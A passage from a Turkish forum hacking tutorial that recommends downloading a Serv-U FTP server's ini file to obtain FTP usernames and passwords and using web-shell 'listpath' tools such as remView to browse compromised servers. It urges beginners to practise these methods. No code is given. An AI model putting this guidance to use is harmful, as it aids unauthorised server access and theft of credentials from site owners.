filesserv-userv-u.ini dosyasını da download edip FTP kullanıcı adı ve şifrelerine de ulaşabiliriz. Bu da aklınızda bulunsun... Aslında en iyi ve zevkli hack yöntemi bu tip listpath programlarını kullanmaktır bence. ASP için *Yasak Kelime*li Şeker gibi Listpath’leri kullanabilirsiniz -ki en iyi ASP listpath’tir diyebilirim-. Bunun dışında PHP destekleyen server’lar için yapılmış listpath’lerde var. Burada link veremiyorum, yönetimden izin almaya vaktim olmadı, ama en azından isim vereyim, remView isimli bir PHP listpath var... Evet arkadaşlar, herkesin yapabileceği, bir konu üzerinde uzmanlık ve fazlaca bilgi gerektirmeyen hacking yöntemleri kısaca bunlar. Bunlardan sonrası ise, üzerine ap-ayrı, başlı başına dökümanlar yazılabilecek uzun ve yeniler için anlaşılması zor konular. Ve bunun dışında, daha fazla ilerlemek için en azından JavaScript, ASP, PHP, CGI, PERL, C Dili, Unix/Linux, SQL, .... gibi konularda en azından temel bilginiz olması gerekiyor ki, tam anlamıyla kendinize "hacker" diyebilin. HTML zaten bilmek zorundasınız. Yoksa anlatılan bir çok şeyi anlayamamanız kuvvetle muhtemel. Bu dökümanda size herkezin uygulayabileceği başlıca hacking yöntemlerini anlatmaya çalıştım ve mantığı kavratmak için bu kadar şey yazdım. Bundan sonrası sizin öğrendiklerinizi misyonumuz dahilinde -kesinlikle küçümsemeden- pratiğe dökmenize ve yukarıda saydığım konular hakkında bilgi toplamaya başlamanıza kalmış. Tekrar söylüyorum; öğrendiklerinizi pratiğe dökmek için çalışmanız çok önemli. ** bu konuda size önemli bir kaynaklık teşkil edecektir. Anlamadıklarınızı sormanız hâlinde size yardım edecek çok fazla insan var burada. Kıymetini bilin **'nun... Bu yöntemlerle de çok şeyler yapabilirsiniz aslına bakarsanız. Ama bilgisayar ve hacking konusunda ilerlemek isteyenlerin yukarıda saydığım konuların yanısıra programlama ile ilgili bilgi sahibi olması lazım. http://i.hizliresim.com/epnv8r.pnghttp://img207.imageshack.us/img207/3926/76440890.gif http://a1212.hizliresim.com/14/m/h1l2r.png |
|||||||||
Etiketler |
hack, hacker, hacker dersleri, hacker nasıl olunur, hacking |
Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir) | |
Seçenekler | |
Stil | |
|
|
Forum | Yasal Uyarı |
Kuruluş : 2013 2013 - "HayalSohbet Forum" her hakkı saklıdır. HS-Forum - HAYALSOHBET iştirakidir. Sohbet - Chat |
YASAL UYARI : İçerik sağlayacı paylaşım sitelerinden biri olan hayal forum Adresimizde 5651 Sayılı Kanun'un 8. Maddesine ve T.C.K'nın 125. Maddesine göre TÜM ÜYELERİMİZ yaptıkları paylaşımlardan sorumludur. hayal forum hakkında yapılacak tüm hukuksal Şikayetler, Yöneticilerimiz ile iletişime geçilmesi yada iletişim formunu doldurulması halinde ilgili kanunlar ve yönetmelikler çerçevesinde en geç 1 (Bir) Hafta içerisinde hayal forum yönetimi olarak tarafımızdan gereken işlemler yapılacak ve size dönüş sağlanacaktır.
|